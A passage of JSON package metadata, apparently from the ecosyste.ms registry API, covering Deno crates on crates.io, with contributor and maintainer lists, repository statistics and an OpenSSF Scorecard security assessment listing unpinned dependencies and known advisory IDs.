/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:21.318Z","updated_at":"2022-11-07T18:29:21.318Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:21.326Z","updated_at":"2022-11-07T18:29:21.326Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047108,"name":"deno_console","ecosystem":"cargo","description":"DEPRECATED: use `deno_web` instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":225,"first_release_published_at":"2021-03-12T21:01:57.003Z","latest_release_published_at":"2025-11-05T07:55:05.769Z","latest_release_number":"0.222.0","last_synced_at":"2026-09-07T22:53:48.680Z","created_at":"2022-04-12T09:58:23.096Z","updated_at":"2026-09-08T00:46:01.428Z","registry_url":"https://crates.io/crates/deno_console/","install_command":"cargo install deno_console","documentation_url":"https://docs.rs/deno_console/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/de